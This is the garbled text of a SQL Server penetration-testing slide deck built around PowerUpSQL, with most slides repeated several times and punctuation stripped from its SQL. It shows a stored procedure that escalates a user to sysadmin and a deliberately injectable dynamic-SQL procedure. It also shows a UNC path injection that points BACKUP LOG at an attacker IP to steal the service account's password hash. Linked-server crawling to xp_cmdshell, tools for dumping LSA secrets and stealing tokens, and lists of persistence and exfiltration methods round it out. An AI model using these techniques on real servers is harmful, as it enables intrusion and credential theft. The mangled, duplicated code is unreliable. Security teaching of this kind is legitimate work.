Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
